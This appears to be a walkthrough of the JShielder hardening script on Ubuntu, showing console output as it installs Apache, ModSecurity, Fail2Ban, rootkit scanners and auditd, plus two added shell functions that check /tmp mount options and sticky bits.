 Success.

 Removing privileges on test database…
 Success. 

 Reloading the privilege tables will ensure that all changes
 made so far will take effect immediately.
 Reload privilege tables now? (Press y|Y for Yes, any other key for No) :y

Success.
 All done!
 Done.
  To EXIT Press x Key, Press ENTER to Continue
  • Then it will install the Apache web server.
[+] Installing Apache Web Server
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 apache2 is already the newest version (2.4.29-1ubuntu4.7).
 The following package was automatically installed and is no longer required:
   libllvm7
 Use 'sudo apt autoremove' to remove it.
 0 upgraded, 0 newly installed, 0 to remove and 1 not upgraded.
 Done.
  To EXIT Press x Key, Press ENTER to Continue
  • Then it will install PHP required files.
[+] Installing, Configuring and Optimizing PHP
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 php is already the newest version (1:7.2+60ubuntu1).
 php-pear is already the newest version (1:1.10.5+submodules+notgz-1ubuntu1.18.04.1).
 php-pear set to manually installed.
 The following package was automatically installed and is no longer required:
   libllvm7
 Use 'sudo apt autoremove' to remove it.
 The following NEW packages will be installed:
   php-cli
 0 upgraded, 1 newly installed, 0 to remove and 1 not upgraded.
 Need to get 3,160 B of archives.
 After this operation, 12.3 kB of additional disk space will be used.
 Get:1 https://us.archive.ubuntu.com/ubuntu bionic/main amd64 php-cli all 1:7.2+60ubuntu1 [3,160 B]
 Fetched 3,160 B in 1s (2,978 B/s)

Preparing to unpack …/python-mysqldb_1.3.10-1build1_amd64.deb …
 Unpacking python-mysqldb (1.3.10-1build1) …
 Setting up python-mysqldb (1.3.10-1build1) …
 [ +++++++++++++++++++++++++++++++++++++++++++++++++++++++ ] OK
  OK
 Done.
  To EXIT Press x Key, Press ENTER to Continue
  • Then it will install ModSecurity.
[+] Installing ModSecurity
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 libxml2 is already the newest version (2.9.4+dfsg1-6.1ubuntu1.2).
 The following package was automatically installed and is no longer required:
   libllvm7
 Use 'sudo apt autoremove' to remove it.
 The following NEW packages will be installed:
   libxml2-dev libxml2-utils
 0 upgraded, 2 newly installed, 0 to remove and 1 not upgraded.
 Need to get 793 kB of archives.
 After this operation, 3,731 kB of additional disk space will be used.
 Do you want to continue? [Y/n] Y

Preparing to unpack …/modsecurity-crs_3.0.2-1_all.deb …
 Unpacking modsecurity-crs (3.0.2-1) …
 Setting up modsecurity-crs (3.0.2-1) …
 Processing triggers for libc-bin (2.27-3ubuntu1) …
 Setting up liblua5.1-0:amd64 (5.1.5-8.1build2) …
 Setting up libapache2-mod-security2 (2.9.2-1) …
 apache2_invoke: Enable module security2
 Processing triggers for libc-bin (2.27-3ubuntu1) …
 Done.
  To EXIT Press x Key, Press ENTER to Continue
  • After that, run the command shown below to restart apache2.
[+] Setting UP OWASP Rules for ModSecurity
 [ +++++++++++++++++++++++++++++++++++++++++++++++++++++++ ]OK
 Enabling module headers.
 To activate the new configuration, you need to run:
   systemctl restart apache2
 Done.
  To EXIT Press x Key, Press ENTER to Continue


 [+] Optimizing Apache
 -- Enabling ModRewrite
 [ ++++++++++++++++++++++++++++++++++++++++++++++++++++++  ]Enabling module rewrite.
 To activate the new configuration, you need to run:
   systemctl restart apache2
 Done.
  To EXIT Press x Key, Press ENTER to Continue
  • Enter email id to receive alerts.
[+] Installing ModEvasive
 Type Email to Receive Alerts testemail.com
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 The following package was automatically installed and is no longer required:
   libllvm7
 Use 'sudo apt autoremove' to remove it.
 The following additional packages will be installed:
   bsd-mailx
 The following NEW packages will be installed:
   bsd-mailx libapache2-mod-evasive
 0 upgraded, 2 newly installed, 0 to remove and 1 not upgraded.
 Need to get 80.5 kB of archives.
 After this operation, 256 kB of additional disk space will be used.
 Do you want to continue? [Y/n] Y
 Get:1 https://us.archive.ubuntu.com/ubuntu bionic/main amd64 bsd-mailx amd64 8.1.2-0.20160123cvs-4 [66.0 kB]
 Get:2 https://us.archive.ubuntu.com/ubuntu bionic/universe amd64 libapache2-mod-evasive amd64 1.10.1-3 [1

Processing triggers for man-db (2.8.3-2ubuntu0.1) …
 Setting up libapache2-mod-evasive (1.10.1-3) …
 apache2_invoke: Enable module evasive
 Done.
  To EXIT Press x Key, Press ENTER to Continue
  • Install Mod_Qos
[+] Installing Mod_Qos/Spamhaus
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 The following package was automatically installed and is no longer required:
   libllvm7
 Use 'sudo apt autoremove' to remove it.
 The following NEW packages will be installed:
   libapache2-mod-qos
 0 upgraded, 1 newly installed, 0 to remove and 1 not upgraded.
 Need to get 202 kB of archives.
 After this operation, 744 kB of additional disk space will be used.
 Get:1 https://us.archive.ubuntu.com/ubuntu bionic/universe amd64 libapache2-mod-qos amd64 11.44-1build1 [202 kB]
 Fetched 202 kB in 3s (80.2 kB/s)
 Selecting previously unselected package libapache2-mod-qos

Building dependency tree
 Reading state information… Done
 E: Unable to locate package libapache2-mod-spamhaus
 Done.
  To EXIT Press x Key, Press ENTER to Continue
  • Then it will configure Fail2ban
[+] Configuring Fail2Ban
 Configuring Fail2Ban……
 [ ok ++++++++++++++++++++++++++++++++++++++++++++++++++   ][….] Restarting fail2ban (via systemctl): fail2ban.service.
 Done.
  To EXIT Press x Key, Press ENTER to Continue
  • Then it installs additional packages.
[+] Installing Additional Packages
 Install tree………….
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 The following package was automatically installed and is no longer required:
   libllvm7
 Use 'sudo apt autoremove' to remove it.
 The following NEW packages will be installed:
   tree
 0 upgraded, 1 newly installed, 0 to remove and 1 not upgraded.
 Need to get 40.7 kB of archives.
 After this operation, 105 kB of additional disk space will be used.
 Get:1 https://us.archive.ubuntu.com/ubuntu bionic/universe amd64 tree amd64 1.7.0-5 [40.7 kB]
 Fetched 40.7 kB in 2s (24.3 kB/s)
 Selecting previously unselected package tree.
 (Reading database … 228842 files and directories currently installed.)
 Preparing to unpack …/tree_1.7.0-5_amd64.deb …
 Unpacking tree (1.7.0-5) …
 Setting up tree (1.7.0-5) …
 Processing triggers for man-db (2.8.3-2ubuntu0.1) …

Setting up apt-show-versions (0.22.7ubuntu1) …
 ** initializing cache. This may take a while **
 Processing triggers for man-db (2.8.3-2ubuntu0.1) …
 Install PHPUnit……….
 config-set succeeded
 Done.
  To EXIT Press x Key, Press ENTER to Continue
  • Then it will apply the additional server hardening steps. Press y or n to disable or keep USB support.
[+] Running additional Hardening Steps
 Running Additional Hardening Steps….
 Reading package lists… Done++++++++++++++++++++++++++   ]
 Building dependency tree
 Reading state information… Done
 Package 'at' is not installed, so not removed
 The following package was automatically installed and is no longer required:
   libllvm7
 Use 'sudo apt autoremove' to remove it.
 0 upgraded, 0 newly installed, 0 to remove and 1 not upgraded.
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 The following package was automatically installed and is no longer required:
   libllvm7

Preparing to unpack …/libpam-cracklib_1.1.8-3.6ubuntu2.18.04.1_amd64.deb …
 Unpacking libpam-cracklib:amd64 (1.1.8-3.6ubuntu2.18.04.1) …
 Processing triggers for man-db (2.8.3-2ubuntu0.1) …
 Setting up libpam-cracklib:amd64 (1.1.8-3.6ubuntu2.18.04.1) …
 Securing Cron
 [ +++++++++++++++++++++++++++++++++++++++++++++++++++++   ]
Do you want to Disable USB Support for this Server? (y/n): n
OK
 Done.
  To EXIT Press x Key, Press ENTER to Continue
  • Then it installs Unhide, which finds hidden processes running in the background.
[+] Installing UnHide
 Unhide is a forensic tool to find hidden processes and TCP/UDP ports by rootkits / LKMs or by another hidden technique.
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 The following package was automatically installed and is no longer required:
   libllvm7
 Use 'sudo apt autoremove' to remove it.
 Suggested packages:
   rkhunter
 The following NEW packages will be installed:
   unhide
 0 upgraded, 1 newly installed, 0 to remove and 1 not upgraded.
 Need to get 46.6 kB of archives.
 After this operation, 136 kB of additional disk space will be used.
 Get:1 https://us.archive.ubuntu.com/ubuntu bionic/universe amd64 unhide amd64 20130526-1 [46.6 kB]
 Fetched 46.6 kB in 2s (25.9 kB/s)
 Selecting previously unselected package unhide.
 (Reading database … 228917 files and directories currently installed.)
 Preparing to unpack …/unhide_20130526-1_amd64.deb …
 Unpacking unhide (20130526-1) …
 Setting up unhide (20130526-1) …
 Processing triggers for man-db (2.8.3-2ubuntu0.1) …

Done.
  To EXIT Press x Key, Press ENTER to Continue
  • Install Tiger and its dependencies.
[+] Installing Tiger
 Tiger is a security tool that can be use both as a security audit and intrusion detection system
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 The following package was automatically installed and is no longer required:
   libllvm7
 Use 'sudo apt autoremove' to remove it.
 The following additional packages will be installed:
   chkrootkit john john-data tripwire
 The following NEW packages will be installed:
   chkrootkit john john-data tiger tripwire
 0 upgraded, 5 newly installed, 0 to remove and 1 not upgraded.
 Need to get 6,868 kB of archives.
 After this operation, 24.0 MB of additional disk space will be used.
 Get:1 https://us.archive.ubuntu.com/ubuntu bionic/universe amd64 tripwire amd64 2.4.3.1-2 [1,647 kB]

Setting up john-data (1.8.0-2build1) …
 Setting up john (1.8.0-2build1) …
 For More info about the Tool use the ManPages
  man tiger
 Done.
  To EXIT Press x Key, Press ENTER to Continue
  • Install Rootkit Hunter.
[+] Installing RootKit Hunter
 Rootkit Hunter is a scanning tool to ensure you are you're clean of nasty tools. This tool scans for rootkits, backdoors and local exploits by running tests like:
 - MD5 hash compare      
 - Look for default files used by rootkits      
 - Wrong file permissions for binaries      
 - Look for suspected strings in LKM and KLD modules      
 - Look for hidden files      
 - Optional scan within plaintext and binary files 

File updated: searched for 181 files, found 152
 ***To Run RootKit Hunter ***
      rkhunter -c --enable all --disable none
      Detailed report on /var/log/rkhunter.log
 Done.
  To EXIT Press x Key, Press ENTER to Continue
  • Then it tunes .bashrc, Vim and nano.
[+] Tunning bashrc, nano and Vim
 Tunning .bashrc……
 [ ++++++++++++++++++++++++++++++++++++++++++++++++++++++  ]OK
 Tunning Vim……
 [ +++++++++++++++++++++++++++++++++++++++++++++++++++++   ]OK
 Tunning Nano……
 [ ++++++++++++++++++++++++++++++++++++++++++++++++++++++  ]OK
 Done.
  To EXIT Press x Key, Press ENTER to Continue
  • Then JShielder creates a daily system update cron job.
[+] Adding Daily System Update Cron Job
 Creating Daily Cron Job
 [ +++++++++++++++++++++++++++++++++++++++++++++++++++++   ] 
 Done.
  To EXIT Press x Key, Press ENTER to Continue
  • Most of JShielder's configuration is automated. Next it installs Artillery.
[+] Cloning Repo and Installing Artillery
 fatal: destination path 'artillery' already exists and is not an empty directory.
 Welcome to the Artillery installer. Artillery is a honeypot, file monitoring, and overall security tool used to protect your nix systems.
 Written by: Dave Kennedy (ReL1K)

 Do you want to install Artillery and have it automatically run when you restart [y/n]: y

[] Adding artillery into startup through init scripts.. [] Triggering update-rc.d on artillery to automatic start…
 [*] Checking out Artillery through github to /var/artillery
 Cloning into '/var/artillery'…
 remote: Enumerating objects: 35, done.
 remote: Counting objects: 100% (35/35), done.
 remote: Compressing objects: 100% (35/35), done.
 remote: Total 1632 (delta 17), reused 3 (delta 0), pack-reused 1597

Setting Iptable rules for artillery
 [ +++++++++++++++++++++++++++++++++++++++++++++++++++++++ ]
 Artillery configuration file is /var/artillery/config
 Done.
  To EXIT Press x Key, Press ENTER to Continue
  • Install PSAD.
[+] Install PSAD
 PSAD is a piece of Software that actively monitors you Firewall Logs to Determine if a scan
        or attack event is in Progress. It can alert and Take action to deter the Threat
    NOTE:    IF YOU ARE ONLY RUNNING THIS FUNCTION, YOU MUST ENABLE 

 LOGGING FOR iptables   
 iptables -A INPUT -j LOG   \
 iptables -A FORWARD -j LOG

 Do you want to install PSAD (Recommended)? (y/n): y

To EXIT Press x Key, Press ENTER to Continue
  • Then disable compilers.
[+] Disabling Compilers
 Disabling Compilers…..
 [ ++++++++++++++++++++++++++++++++++++++++++++++++++++++  ]
  If you wish to use them, just change the Permissions
  Example: chmod 755 /usr/bin/gcc 
  OK
 Done.
  To EXIT Press x Key, Press ENTER to Continue
  • Now secure the /tmp folder. Enter y.
[+] Securing /tmp Folder
 ¿Did you Create a Separate /tmp partition during the Initial Installation? (y/n): y

Nice Going, Remember to set proper permissions in /etc/fstab
 Example:
 /dev/sda4   /tmp   tmpfs  loop,nosuid,noexec,rw  0 0 
 Done.
  To EXIT Press x Key, Press ENTER to Continue
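The script only reminds you to set the /tmp mount options in /etc/fstab; the following function, an added example that is not part of the article or of JShielder, checks an fstab-format file for that. It assumes the required options are nosuid and noexec (from the script's example line) plus nodev, which is added here as a usual companion.

```shell
#!/bin/sh
# Added example, not part of the article or of JShielder: check that the /tmp
# entry in an fstab-format file carries the hardening mount options the
# script's reminder refers to (nosuid, noexec; nodev is assumed here as a
# common companion). Prints each missing option on its own line, or
# "no-/tmp-entry" when the file has no /tmp line; prints nothing when the
# entry is fully hardened.
tmp_missing_mount_opts() {
  # $1: path to an fstab-format file (e.g. /etc/fstab)
  awk '
    $1 !~ /^#/ && NF >= 4 && $2 == "/tmp" {
      found = 1
      for (k in have) delete have[k]          # reset for this entry
      n = split($4, opt, ",")
      for (i = 1; i <= n; i++) have[opt[i]] = 1
      m = split("nosuid,noexec,nodev", want, ",")
      for (j = 1; j <= m; j++) if (!(want[j] in have)) print want[j]
    }
    END { if (!found) print "no-/tmp-entry" }
  ' "$1"
}

# Exit status 0 when the /tmp entry is present and fully hardened, 1 otherwise.
tmp_is_hardened() {
  [ -z "$(tmp_missing_mount_opts "$1")" ]
}
```

Run it as `tmp_is_hardened /etc/fstab` after editing the file, before the reboot that activates the new mount options.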
  • JShielder will restrict access to apache config files.
[+] Restricting Access to Apache Config Files
 Restricting Access to Apache Config Files……
 [ ++++++++++++++++++++++++++++++++++++++++++++++++++++    ] OK
 Done.
  To EXIT Press x Key, Press ENTER to Continue
  • Then it enables unattended security updates. Press y.
[+] Enable Unattended Security Updates
 ¿Do you Wish to Enable Unattended Security Updates? (y/n): y
  • It then installs the process accounting package (acct).
0 upgraded, 1 newly installed, 0 to remove and 1 not upgraded.
 Need to get 87.2 kB of archives.
 After this operation, 304 kB of additional disk space will be used.
 Get:1 https://us.archive.ubuntu.com/ubuntu bionic/main amd64 acct amd64 6.6.4-1 [87.2 kB]
 Fetched 87.2 kB in 2s (48.7 kB/s)                      
 Selecting previously unselected package acct.
 (Reading database … 229408 files and directories currently installed.)
 Preparing to unpack …/acct_6.6.4-1_amd64.deb …
 Unpacking acct (6.6.4-1) …
 Processing triggers for ureadahead (0.100.0-21) …
 Processing triggers for install-info (6.5.0.dfsg.1-2) …
 Setting up acct (6.6.4-1) …
 update-rc.d: warning: start and stop actions are no longer supported; falling back to defaults
 update-rc.d: warning: stop runlevel arguments (1) do not match acct Default-Stop values (0 1 6)
 Processing triggers for libc-bin (2.27-3ubuntu1) …
 Processing triggers for systemd (237-3ubuntu10.24) …
 Processing triggers for man-db (2.8.3-2ubuntu0.1) …
 Processing triggers for ureadahead (0.100.0-21) …
 OK
  • Install auditd. Enter y.
[+] Installing auditd
 Reading package lists… Done
 Building dependency tree       
 Reading state information… Done
 The following package was automatically installed and is no longer required:
   libllvm7
 Use 'sudo apt autoremove' to remove it.
 The following additional packages will be installed:
   libauparse0
 Suggested packages:
   audispd-plugins

After this operation, 803 kB of additional disk space will be used.
 Do you want to continue? [Y/n] Y

Processing triggers for systemd (237-3ubuntu10.24) …
 Processing triggers for man-db (2.8.3-2ubuntu0.1) …
 Processing triggers for ureadahead (0.100.0-21) …
 Enabling auditing for processes that start prior to auditd
 [ +++++++++++++++++++++++++++++++++++++++++++++++++++++++ ]Sourcing file `/etc/default/grub'
 Generating grub configuration file …
 Found linux image: /boot/vmlinuz-4.18.0-25-generic
 Found initrd image: /boot/initrd.img-4.18.0-25-generic
 Found linux image: /boot/vmlinuz-4.18.0-15-generic
 Found initrd image: /boot/initrd.img-4.18.0-15-generic
 Found memtest86+ image: /boot/memtest86+.elf
 Found memtest86+ image: /boot/memtest86+.bin
 done
 Configuring Auditd Rules
 [ ++++++++++++++++++++++++++++++++++++++++++++++++++++++  ]

Done.
  To EXIT Press x Key, Press ENTER to Continue
  • JShielder installs and enables sysstat.
[+] Installing and enabling sysstat
 Reading package lists… Done
 Building dependency tree       
 Reading state information… Done
 The following package was automatically installed and is no longer required:
   libllvm7
 Use 'sudo apt autoremove' to remove it.
 Suggested packages:
   isag
 The following NEW packages will be installed:
   sysstat
 0 upgraded, 1 newly installed, 0 to remove and 1 not upgraded.
 Need to get 295 kB of archives.
 After this operation, 1,192 kB of additional disk space will be used.
 Get:1 https://us.archive.ubuntu.com/ubuntu bionic/main amd64 sysstat amd64 11.6.1-1 [295 kB]
 Fetched 295 kB in 2s (124 kB/s)    

Processing triggers for systemd (237-3ubuntu10.24) …
 Processing triggers for man-db (2.8.3-2ubuntu0.1) …

 OK
 Done.
  To EXIT Press x Key, Press ENTER to Continue                
  • Install ArpWatch to monitor ARP traffic. Enter y.
[+] ArpWatch Install
 ArpWatch is a tool for monitoring ARP traffic on System. It generates log of observed pairing of IP and MAC.
 Do you want to Install ArpWatch on this Server? (y/n): y

Synchronizing state of arpwatch.service with SysV service script with /lib/systemd/systemd-sysv-install.
 Executing: /lib/systemd/systemd-sysv-install enable arpwatch

 OK
 Done.
  To EXIT Press x Key, Press ENTER to Continue
  • Set the GRUB bootloader password. More information on how the bootloader works is part of the advanced ethical hacking course of the International Institute of Cyber Security (IICS, iiCyberSecurity).
[+] GRUB Bootloader Password
 It is recommended to set a password on GRUB bootloader to prevent altering boot configuration (e.g. boot in single user mode without password)
 Do you want to set a GRUB Bootloader Password? (y/n): y

Do you want to set a GRUB Bootloader Password? (y/n): y
 Enter password: 
 Reenter password: 
 PBKDF2 hash of your password is grub.pbkdf2.sha512.10000.15D5D8416652D02126C81FCF8C49A59B82F070F8010A13412C420345E97AA9CADC8798E7218A27105875C0C0950DC6A7EAC1D3DA92C32A6107FF572CB42A1D53.C05B506339CB3227411FF804E9587808E40CD72DD07CD749B004D324E9F90D2A4D092E6C9BE64E6E61DC71FB32A8DB00E65CA7BE6582975E30F64C9D46CD1C19
 Sourcing file `/etc/default/grub'
 Generating grub configuration file …

Found memtest86+ image: /boot/memtest86+.bin
 done
 On every boot enter root user and the password you just set
 OK
 Done.
  To EXIT Press x Key, Press ENTER to Continue
  • Secure boot settings.
Securing Boot Settings
 [ +++++++++++++++++++++++++++++++++++++++++++++++++++++++ ] 
 Done.
  To EXIT Press x Key, Press ENTER to Continue


 [+] Setting File Permissions on Critical System Files
 [ +++++++++++++++++++++++++++++++++++++++++++++++++++++   ]
 Setting Sticky bit on all world-writable directories
 [ +++++++++++++++++++++++++++++++++++++++++++++++++++++   ]
: Read-only file system
 chmod: changing permissions of '/snap/core/7270/tmp': Read-only file system
 chmod: changing permissions of '/snap/core/7270/var/tmp': Read-only file system
 chmod: changing permissions of '/snap/core/6350/run/lock': Read-only file system
 chmod: changing permissions of '/snap/core/6350/tmp': Read-only file system
 chmod: changing permissions of '/snap/core/6350/var/tmp': Read-only file system
 chmod: changing permissions of '/snap/core18/1049/run/lock': Read-only file system
 chmod: changing permissions of '/snap/core18/1049/tmp': Read-only file system
 chmod: changing permissions of '/snap/core18/1049/var/tmp': Read-only file system

  OK
 Done.
  To EXIT Press x Key, Press ENTER to Continue
  • Above you can see that the permissions have been changed and all steps are complete. JShielder then displays a message that it has fully configured Ubuntu for creating and deploying web applications.
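The "Setting Sticky bit on all world-writable directories" step above shows chmod failing on read-only snap mounts. The functions below, an added example that is not part of the article or of JShielder, audit a directory tree for world-writable directories that lack the sticky bit and repair them while tolerating such failures; the function names are hypothetical.

```shell
#!/bin/sh
# Added example, not part of the article or of JShielder: audit and repair the
# sticky bit on world-writable directories. Without the sticky bit, any user
# can delete or rename other users' files in such a directory.

# Print every directory below $1 that is world-writable (o+w) but lacks the
# sticky bit. -xdev stays on the starting filesystem, so read-only mounts such
# as /snap/core/* (where chmod failed in the output above) are not walked.
list_unsticky_ww_dirs() {
  find "$1" -xdev -type d -perm -0002 ! -perm -1000 2>/dev/null
}

# Number of such directories, for a before/after comparison.
count_unsticky_ww_dirs() {
  list_unsticky_ww_dirs "$1" | wc -l | tr -d ' '
}

# Set the sticky bit on each directory reported above. A failure (for example
# a read-only filesystem) is reported on stderr but does not stop the run.
fix_sticky_bit() {
  list_unsticky_ww_dirs "$1" | while IFS= read -r d; do
    chmod +t "$d" || echo "could not set sticky bit on $d" >&2
  done
}
```

Run `count_unsticky_ww_dirs /` before and after `fix_sticky_bit /` to confirm the repair; a non-zero count afterwards points at directories on filesystems the script cannot modify.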


]]>